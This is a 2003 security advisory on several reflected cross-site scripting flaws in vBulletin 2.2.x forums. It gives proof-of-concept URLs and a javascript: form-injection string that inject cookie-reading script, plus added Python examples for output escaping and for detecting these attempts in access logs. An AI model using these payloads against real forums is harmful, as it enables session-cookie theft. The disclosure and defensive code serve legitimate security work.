vBulletin Multiple Cross Site Scripting Vulnerabilities

From: Roberto (roberto_at_XDESIGN.IT)
Date: 09/17/03

    Date:         Wed, 17 Sep 2003 18:03:55 +0100
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    SYSTEMS AFFECTED
    ================

    Jelsoft Enterprises vBulletin Forum

    (exploited with a browser)

    CONTENTS
    ========

    Subject: vBulletin Multiple Cross Site Scripting Vulnerabilities

    Date: 17 September 2003 (release from old archive, flaws found on 7 September 2002)

    Risk: Low

    DESCRIPTION
    ===========

    The vBulletin Forum can be made to return malicious content to a user's browser.

    There are multiple cross-site scripting (CSS, as it was then abbreviated) vulnerabilities (version 3.0 and prior).

    DETAILS
    =======

    1) The first bug affects vBulletin version 2.2.7, 2.2.6 and probably previous versions.

    The "aim" parameter is not filtered, so malicious script can be executed:

    www.host.com/forum/member.php?s=&action=aimmessage&aim=<script>alert(document.cookie)</script>

    2) The second one is more difficult to exploit and affects only 2.2.6 (or previous).

    Folder names allow execution of code. Version 2.2.7 seems to patch this flaw.

    Type in a browser:

    javascript:document.write('<form name="form1" action="http://www.host.com/forum/private.php" method="post"><input
    type="hidden" name="s" value=""><input type="hidden" name="highest" value="3"><input type="hidden"
    name="folderlist[2]" value="<script>alert(document.cookie)</script>"><input type="hidden" name="folderlist[3]"
    value=""><input type="hidden" name="folderlist[4]" value=""><input type="hidden" name="action"
    value="doeditfolders"><input type="submit" name="submit" value="write to me"></form>');

    3) The third bug is exploited through the "membername" parameter in Quickfind form.

    Tested on 2.2.6 with quickfind enabled (quickfind is a hack, i.e. an add-on modification).

    4) CSS in Lost Password form:

    www.host.com/forum/member.php?s=&action=lostpw&url="><script>alert(document.cookie)</script>

    5) CSS in showthread, word highlight function:

    www.host.com/forum/showthread.php?s=&threadid=xxxx&highlight="><script>alert(document.cookie)</script>

    6) CSS on 2.2.9 and prior. Type this in a forum index page:

    javascript:who(document.cookie)
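Every item above is the same defect in two HTML contexts: a parameter echoed into an attribute value (the lostpw "url" field, the private-message folder names) or into page markup (the "highlight" terms in showthread). The fix is output encoding at the point of insertion. The following is an added example, not vBulletin's code and not part of the advisory: a model of the unescaped echo next to an escaped one, and a small word-highlight renderer that splits the post on the search terms before escaping each piece, so neither the post text nor the terms can contribute markup. The function names and the test string are assumptions for illustration.

```python
import html
import re

# Added example (not vBulletin code): output encoding for the two reflection
# contexts the advisory describes, a hidden form field (lostpw "url") and the
# showthread word-highlight feature ("highlight").

PAYLOAD = '"><script>alert(document.cookie)</script>'  # the advisory's test string


def hidden_input_unsafe(name: str, value: str) -> str:
    """Model of the flaw: the parameter is echoed straight into an attribute,
    so a double quote in the value closes the attribute and the tag."""
    return f'<input type="hidden" name="{name}" value="{value}">'


def hidden_input(name: str, value: str) -> str:
    """Hardened form: HTML-escape both name and value (quote=True also
    encodes the double quote, which is what matters inside an attribute)."""
    return (f'<input type="hidden" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(value, quote=True)}">')


def render_highlight(post_body: str, highlight: str) -> str:
    """Render a post with each whitespace-separated highlight term wrapped in
    <b>...</b>. The body is split on the terms *before* escaping and every
    piece is escaped individually, so neither the post text nor the terms can
    contribute markup, and the <b> tags never land inside an escaped entity."""
    terms = [t for t in highlight.split() if t]
    if not terms:
        return html.escape(post_body, quote=True)
    # One capturing group: re.split then yields [text, match, text, match, ...]
    pattern = re.compile("(" + "|".join(re.escape(t) for t in terms) + ")",
                         re.IGNORECASE)
    out = []
    for i, piece in enumerate(pattern.split(post_body)):
        escaped = html.escape(piece, quote=True)
        out.append(f"<b>{escaped}</b>" if i % 2 else escaped)
    return "".join(out)


if __name__ == "__main__":
    print(hidden_input_unsafe("url", PAYLOAD))   # breaks out of the attribute
    print(hidden_input("url", PAYLOAD))          # stays inside it, rendered as text
    print(render_highlight("Use <script> tags carefully", "script"))
```

Splitting before escaping matters: escaping the whole body first and then wrapping matches would let a term such as "amp" land inside "&amp;" and corrupt the entity, which is a different way for the highlighter to emit markup it did not intend.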

    RISKS
    =====

    Stealing cookies, which may contain critical data (personal information,
    passwords, etc).

    WORKAROUNDS
    ===========

    Upgrade to new releases.
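Until the upgrade is done, attempts against the parameters named in this advisory are easy to spot in the web server's access log, since the reflected value travels in the query string. The following is an added example, not part of the advisory: a small checker for combined-format access logs that flags requests to member.php, showthread.php and private.php whose watched parameters carry tag or quote characters or a javascript: scheme, decoding a second time to catch double-encoded values. The log lines are constructed (RFC 5737 documentation addresses) and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Added example (not part of the advisory): flag reflected-XSS attempts against
# the vBulletin scripts and parameters the advisory names, in Apache/nginx
# combined-format access logs.

# script basename -> query parameters the advisory reports as unfiltered
WATCHED = {
    "member.php": {"aim", "url"},
    "showthread.php": {"highlight"},
    "private.php": {"folderlist"},
}

# Characters that have no business in these parameters: anything that can open
# or close a tag or attribute, plus a javascript: URL scheme.
MARKERS = re.compile(r'[<>"]|javascript:', re.IGNORECASE)

# Minimal combined-log parser: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def check_line(line: str):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED.get(script)
    if not watched:
        return None
    # parse_qsl percent-decodes once; unquote again to catch double encoding
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        base = name.split("[", 1)[0]          # folderlist[2] -> folderlist
        decoded = unquote(value)
        if base in watched and MARKERS.search(decoded):
            return {"client": m.group("client"), "time": m.group("ts"),
                    "script": script, "param": name, "value": decoded,
                    "status": m.group("status")}
    return None


def scan(lines):
    """Run check_line over an iterable of log lines and keep the findings."""
    return [f for f in (check_line(line) for line in lines) if f]


# Constructed sample lines: two attempts among ordinary traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Sep/2003:18:03:55 +0100] "GET /forum/member.php?s=&action=aimmessage'
    '&aim=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/Sep/2003:18:04:10 +0100] "GET /forum/showthread.php?s=&threadid=1234'
    '&highlight=security HTTP/1.1" 200 18220 "-" "Mozilla/4.0"',
    '203.0.113.9 - - [17/Sep/2003:18:05:02 +0100] "GET /forum/showthread.php?s=&threadid=1234'
    '&highlight=%2522%253E%253Cscript%253E HTTP/1.1" 200 18310 "-" "Mozilla/4.0"',
    '198.51.100.8 - - [17/Sep/2003:18:05:40 +0100] "GET /forum/member.php?s=&action=getinfo'
    '&userid=42 HTTP/1.1" 200 7311 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['script']} {f['param']}={f['value']!r}")
```

Two of the six items are not visible this way: the folder-name case (item 2) is submitted in a POST body, which the access log does not record, and the javascript: URL in item 6 runs entirely inside the browser and never reaches the server. Those need application-side logging or, more simply, the upgrade.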

    VENDOR STATUS
    =============

    vBulletin programmers were notified on 7 September 2002.

    All the flaws have been patched since version 2.2.8 (also in the 3.0 beta).

    DISCLAIMER
    ==========

    This information is supplied for educational purposes only.

    The author is not liable for the direct or indirect use of this
    information, which may not be used to modify or interrupt the operation
    of computer systems.

    LEGAL NOTICE
    ============

    This advisory is Copyright (c) 2003 Roberto Dapino.

    It can be reproduced without the author's written permission

    only if unmodified.

    CREDITS
    =======

    Vulnerabilities found by Roberto Dapino, Italy. - roberto@xdesign.it

    Special thanks to: vBulletin Programmers.

    xdesign.it - stormvision.it
